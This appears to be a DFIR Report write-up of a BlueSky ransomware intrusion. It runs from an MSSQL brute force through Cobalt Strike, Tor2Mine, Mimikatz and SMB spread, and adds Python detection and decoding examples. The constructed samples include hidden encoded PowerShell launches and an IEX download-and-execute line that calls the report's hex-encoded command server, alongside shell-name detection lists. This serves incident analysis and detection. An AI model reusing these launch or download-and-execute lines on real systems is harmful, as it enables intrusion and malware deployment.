In December 2022, we observed an intrusion on a public-facing MSSQL Server, which resulted in the deployment of BlueSky ransomware.
First discovered in June 2022, BlueSky ransomware has code links to Conti and Babuk ransomware.
While other reports point to malware downloads as the initial access vector, in this case the threat actors gained access via an MSSQL brute-force attack.
Within one hour of the threat actors accessing the network, they had deployed BlueSky ransomware network wide.
In the month of December 2022, we observed a cluster of activity targeting MSSQL servers.
The command executed through the SQL Server contained base64-encoded PowerShell which, upon execution, established a connection to a Cobalt Strike command and control server.
The PowerShell session was then seen making a connection to a Tor2Mine stager server.
Around 15 minutes after initial access, the threat actors then moved laterally toward domain controllers and file shares using remote service creation.
These services were used to execute the same PowerShell commands, which downloaded and executed the Tor2Mine malware.
Upon establishing access to one of the domain controllers, the threat actors performed similar activity to that observed on the beachhead. Roughly 30 minutes after initial access, the BlueSky ransomware binary was dropped and executed on the beachhead. The execution succeeded and the ransomware spread to all devices in the network over SMB. The time to ransomware in this case was 32 minutes.
The Cobalt Strike server observed in this intrusion was first observed on December 16th 2022 and remained active through January 17th 2023.
The PowerShell scripts involved in this case as well as infrastructure for the Tor2Mine server were observed being reused in May 2023 with the PaperCut NG CVE-2023-27350 exploit as the initial access source.
We offer multiple services including a Threat Feed service which tracks Command and Control frameworks such as Cobalt Strike, Sliver, BianLian, Metasploit, Empire, Havoc, etc.
In the next attack stage, the threat actors established a command shell via an extended SQL Server stored procedure.
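The three early stages described above (the MSSQL brute force that gave initial access, the SQL Server process spawning a command shell through an extended stored procedure, and lateral movement via remote service creation) each leave a distinctive log pattern. The following is an added detection example, not code from the report: it assumes xp_cmdshell-style execution shows up as sqlservr.exe parenting a shell, and the event records are constructed to mimic SQL Server login events (18456/18454), Sysmon process creation (Event ID 1) and System service installation (Event ID 7045). The IP addresses, service name and paths are illustrative only.

```python
"""Detection logic for the MSSQL brute force, the SQL Server process
spawning a command shell, and command-line services installed for lateral
movement. Added example; not code from the report. All events below are
constructed to mimic the relevant log fields, not real telemetry."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real telemetry).
#   kind="sql_login"   mimics SQL Server login failed/succeeded (Event ID 18456/18454)
#   kind="proc"        mimics Sysmon Event ID 1 (process creation)
#   kind="svc_install" mimics System Event ID 7045 (a new service was installed)
SAMPLE_EVENTS = [
    {"ts": "2022-12-16T09:58:00", "kind": "sql_login", "src_ip": "198.51.100.9", "user": "sa", "ok": False},
    {"ts": "2022-12-16T10:00:00", "kind": "sql_login", "src_ip": "203.0.113.7", "user": "sa", "ok": False},
    {"ts": "2022-12-16T10:00:05", "kind": "sql_login", "src_ip": "203.0.113.7", "user": "sa", "ok": False},
    {"ts": "2022-12-16T10:00:10", "kind": "sql_login", "src_ip": "203.0.113.7", "user": "sa", "ok": False},
    {"ts": "2022-12-16T10:00:15", "kind": "sql_login", "src_ip": "203.0.113.7", "user": "sa", "ok": False},
    {"ts": "2022-12-16T10:00:20", "kind": "sql_login", "src_ip": "203.0.113.7", "user": "sa", "ok": False},
    {"ts": "2022-12-16T10:00:25", "kind": "sql_login", "src_ip": "203.0.113.7", "user": "sa", "ok": False},
    {"ts": "2022-12-16T10:00:30", "kind": "sql_login", "src_ip": "203.0.113.7", "user": "sa", "ok": True},
    {"ts": "2022-12-16T10:01:00", "kind": "proc",
     "parent": r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c powershell -nop -w hidden -enc SQBFAFgA..."},  # truncated placeholder blob
    {"ts": "2022-12-16T10:05:00", "kind": "proc",
     "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe"},  # benign: an interactive shell from explorer
    {"ts": "2022-12-16T10:15:00", "kind": "svc_install", "host": "DC01",
     "service_name": "a1b2c3",  # hypothetical random service name
     "image_path": "%COMSPEC% /C powershell -nop -w hidden -enc SQBFAFgA..."},
    {"ts": "2022-12-16T10:16:00", "kind": "svc_install", "host": "DC01",
     "service_name": "Sysmon64", "image_path": r"C:\Windows\Sysmon64.exe"},  # benign
]


def detect_bruteforce(events, threshold=5, window=timedelta(minutes=5)):
    """Return {src_ip: info} for sources with >= `threshold` failed SQL logins
    inside a sliding `window`. `success_after` records whether a successful
    login followed the burst, which is the signature of a brute force that worked."""
    attempts = defaultdict(list)
    for e in events:
        if e["kind"] == "sql_login":
            attempts[e["src_ip"]].append((datetime.fromisoformat(e["ts"]), e["ok"]))
    hits = {}
    for ip, seq in attempts.items():
        seq.sort()
        fails = [t for t, ok in seq if not ok]
        for i, start in enumerate(fails):
            j = i
            while j < len(fails) and fails[j] - start <= window:
                j += 1
            if j - i >= threshold:
                hits[ip] = {
                    "failed": len(fails),
                    "success_after": any(ok and t >= start for t, ok in seq),
                }
                break
    return hits


SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_sql_shell(events):
    """Flag process creations where sqlservr.exe is the parent of a shell or
    script host: the process tree that xp_cmdshell-style execution produces.
    A healthy SQL Server install has almost no reason to spawn these."""
    return [e for e in events if e["kind"] == "proc"
            and _basename(e["parent"]) == "sqlservr.exe"
            and _basename(e["image"]) in SHELLS]


SERVICE_MARKERS = ("%comspec%", "cmd.exe", "powershell", "-enc", "-encodedcommand")


def detect_service_exec(events):
    """Flag newly installed services whose ImagePath is a command line rather
    than a service binary, the residue remote service creation leaves in 7045."""
    return [e for e in events if e["kind"] == "svc_install"
            and any(m in e["image_path"].lower() for m in SERVICE_MARKERS)]


if __name__ == "__main__":
    print("brute force:", detect_bruteforce(SAMPLE_EVENTS))
    for e in detect_sql_shell(SAMPLE_EVENTS):
        print("sqlservr.exe spawned shell:", e["cmdline"])
    for e in detect_service_exec(SAMPLE_EVENTS):
        print("suspicious service:", e["host"], e["service_name"], e["image_path"])
```

The brute-force rule keys on a burst of failures followed by a success from the same source, which separates a working attack from background scanning noise; the other two rules are parent/child and ImagePath checks that need no threshold at all, since sqlservr.exe spawning cmd.exe or a service whose path starts with %COMSPEC% is suspicious on its own.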
The threat actor then executed a Cobalt Strike beacon and a PowerShell script that has previously been identified by Sophos as used in campaigns to deploy Tor2Mine malware.
Ps1, a PowerShell version of Mimikatz, was downloaded from the Tor2Mine server.
The threat actor was seen injecting code into the legitimate process winlogon.exe.
During the intrusion the threat actor deployed the XMRig miner, which loaded the WinRing0 driver.
Ps1, the threat actor created 16 different scheduled tasks on the hosts where Tor2Mine was deployed.
Decoding the command we can see the same PowerShell download and execute as observed on the beachhead. The hexadecimal value 0x53611451 corresponds to the IP address 83.97.20[.]81 which was the command and control server for the Tor2Mine malware.
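Decoding a task command like the one above involves two layers: the base64 blob passed to PowerShell's -EncodedCommand, which is UTF-16LE text rather than UTF-8, and an IPv4 address written as a 32-bit hexadecimal integer. The following is an added decoder example, not code from the report; the script text, file name and command line it decodes are constructed for illustration, and only the hex value 0x53611451 and its dotted-quad reading come from the page.

```python
"""Decoder for the two encoding layers in the scheduled-task commands:
a base64 -EncodedCommand payload (UTF-16LE) and an IPv4 address written
as a hexadecimal integer. Added example, not code from the report; the
command line and script below are constructed for illustration."""
import base64
import ipaddress
import re
import struct

# Constructed stand-in for a decoded task command (hypothetical path).
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://0x53611451/stage.ps1')"
# -EncodedCommand is base64 over UTF-16LE, not UTF-8, so build the blob that way.
SAMPLE_BLOB = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
SAMPLE_CMDLINE = "powershell.exe -nop -w hidden -enc " + SAMPLE_BLOB

# PowerShell accepts any unambiguous prefix of -EncodedCommand; longest first.
_ENC_ARG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
_HEX_IP = re.compile(r"\b0x[0-9A-Fa-f]{8}\b")


def extract_encoded(cmdline):
    """Return the base64 argument of -enc/-EncodedCommand, or None."""
    m = _ENC_ARG.search(cmdline)
    return m.group(1) if m else None


def decode_encoded_command(blob):
    """Decode a -EncodedCommand blob. Padding is restored first because blobs
    copied out of logs or task XML are often cut at the trailing '='."""
    blob = blob.strip()
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob).decode("utf-16-le")


def hex_to_ip(token):
    """Return both readings of a 32-bit hex literal as a dotted quad.

    big:    bytes in the order written, 0x53611451 -> 83.97.20.81; this is the
            reading that matches the report and what inet_aton-style parsing
            of a URL host like http://0x53611451/ uses.
    little: byte-reversed, 81.20.97.83; per the .NET documentation the
            IPAddress(Int64) constructor (what [ipaddress]0x53611451 hits in
            PowerShell) treats the value as network byte order and yields this.
    Check both before pivoting on an indicator."""
    n = int(token, 16)
    big = str(ipaddress.IPv4Address(n))
    little = str(ipaddress.IPv4Address(struct.unpack("<I", struct.pack(">I", n))[0]))
    return big, little


def find_hex_ips(text):
    """All 8-digit hex literals in `text` with both dotted-quad readings."""
    return [(t, *hex_to_ip(t)) for t in _HEX_IP.findall(text)]


def analyze(cmdline):
    """End to end: pull the -enc blob off a command line, decode it, resolve hex IPs."""
    blob = extract_encoded(cmdline)
    if blob is None:
        return {"script": None, "ips": []}
    script = decode_encoded_command(blob)
    return {"script": script, "ips": find_hex_ips(script)}


if __name__ == "__main__":
    result = analyze(SAMPLE_CMDLINE)
    print(result["script"])
    for token, big, little in result["ips"]:
        print(f"{token}: {big} (as written) / {little} (byte-reversed)")
```

The byte-order caveat matters in practice: the same literal resolves to 83.97.20[.]81 when a URL parser or manual hex-to-octet conversion reads it, but to 81.20.97.83 if cast through .NET's IPAddress(Int64), so an analyst who reconstructs the indicator the wrong way around will block or hunt for the wrong host.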
Published on thedfirreport.com, Mon, 04 Dec 2023 02:13:10 +0000.